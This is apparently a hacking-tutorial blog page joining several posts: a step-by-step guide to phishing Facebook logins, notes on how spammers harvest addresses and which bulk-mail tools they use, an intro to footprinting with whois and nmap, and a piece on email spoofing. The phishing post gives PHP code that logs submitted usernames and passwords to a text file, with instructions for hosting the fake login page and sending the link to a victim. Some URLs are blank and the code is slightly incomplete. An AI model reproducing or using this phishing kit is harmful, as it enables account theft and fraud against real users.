
Hack A Facebook Account By Phishing

Phishing is the act of fooling a computer user into submitting personal information by creating a counterfeit website that looks like a real (and trusted) site. It is a hacker technique of "fishing" for passwords and other secret financial info.
So now i am starting to show you how to hack someone by phishing...
1). Go to
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.

2). Now find (Press ctrl +f)  for "action="  in that code.
You have to change two things in that code..first of all you have to change method from POST to Get and secondly you have to change ACTION from" to "next.php"
Save the document as index.html and change the file type as All Files.

3). Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

        header("Location: ");
        $handle = fopen("pswrds.txt", "a");
        foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
        fwrite($handle, "\r\n");

    save this file as "next.php"

4). Open the notepad and Now create a blank file and named it as  "pswrds.txt". Now onwards You have three files..first is "index.html".Second is "next.php" and third is "pswrds.txt"
Now we have to upload this three files on a php web hosting service.
I am using Its an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms.

5). Go to on and click on sign up. and select any domain name.

6). After doing above steps you have to verify your mail account that you used at the time of signup process. Verify your mail account.

7). Click on the site link which is shown under DOMAIN section to go to your control panel.

8). Now when you are logged into your account click on the Go to cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

9). After logging to Your File manager Section. Now Click on the Public_html directory.

10). Before proceeding to next delete default.php under public_html directory.Now click on the Upload button, choose the three file that we created earlier.(index.html,next.php and pswrds.txt).

11). Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwrds.txt" file.

12). Now Everything is set. The Only thing that we have to do is that pass the link to victim. After that if he/she login through that link then we are able to get his/her account and password.
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Spam can be defined as Electronic junk mail or junk newsgroup postings. Some people define spam even more generally as any unsolicited e-mail. Real spam is generally e-mail advertising for some product sent to a mailing list.In addition to wasting people's time with unwanted e-mail, spam also eats up a lot of network bandwidth. Consequently, there are many organizations, as well as individuals, who have taken it upon themselves to fight spam with a variety of techniques. But because the Internet is public, there is really little that can be done to prevent spam, just as it is impossible to prevent junk mail. However, some online services have instituted policies to prevent spammers from spamming their subscribers.

Now how a spammer can able to get Your email id. This can be done by following ways...

1)Social networking sites.
Many people on social networking sites leave thier privacy settings to very low.Its very easy to get E-mail id or other contact information on this kind of sites. Many spammers try to concentrate on this kind of sites for generating a spam list.

2)Online Applications 
Facebook also have a large number of application support but have you ever noticed that when we add any application to our profile it asks for permission to add our personal data to their database. These application adds data like email id,contact number of user to their database and this data list can be used by a spammer for spamming purpose.

3)Web-mail Extractors e.t.c
 Web-mail miner is free application to extract Email addresses from websites ,search engines,newsgroups.the working of this software is very easy. It searches for a user defined string pattern on a domain name.i.e

There are lots of tools available in market for spamming purpose.
some of them are 123 hidden sender, direct sender, mail bomber, send blaster, e.t.c.
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Footprinting is the first and most convenient way that hackers use to gather information about computer systems and the companies they belong to. The purpose of footprinting is to learn a much you can about a system, its remote access capabilities, its ports and services,and the aspects of its security.
In order to perform a successful hack on a system,it is best to know as much as you can.

There are Mainly Two Types of Footprinting

1) DNS Footprinting
In this a hacker tries to gather information on Domain name registration on various things like,Registration details,Server Type,Ip address, Location, Contact numbers e.t.c.
There are various tools that can be used in DNS Footprinting like whois and samspade are popular tools in this category But i will recommend whois.

Let see how we can Footprint a Website by its domain.
STEP 2: Type website URL which you want to footprint. (i.e , or ip address of website) and click on Search for domain.
STEP 3: Footprinting process is now over. All information related to that domain name is in front of you. Information from its owner to its server type e.t.c. The all you have to do is to take a close look on whois record,site profile,registration,server stats Tabs. This information is very important from a hacker point of view.

2) Network Footprinting

This is a type of footprinting in which a hacker tries to gather information about Network Topology,hosts,operating system e.t.c
There are various tools which are used for Network Footprinting. But nmap is best among them all.
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Email Spoofing

E-mail spoofing is the forgery of an e-mail header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations.

Senders insert commands in headers that will alter message information. It is possible to send a message that appears to be from anyone, anywhere, saying whatever the sender wants it to say. Thus, someone could send spoofed e-mail that appears to be from you with a message that you didn't write.

Above all is just a Small explanation on what is E-mail spoofing. these are the websites which are used to send fake emails

above all  is my favourite because it provide some advance option like email-header, reply to,cc etc.

You can also send from your cmd, but for that purpose you need S.M.T.P server name of your I.S.P. so use above services only for fun.
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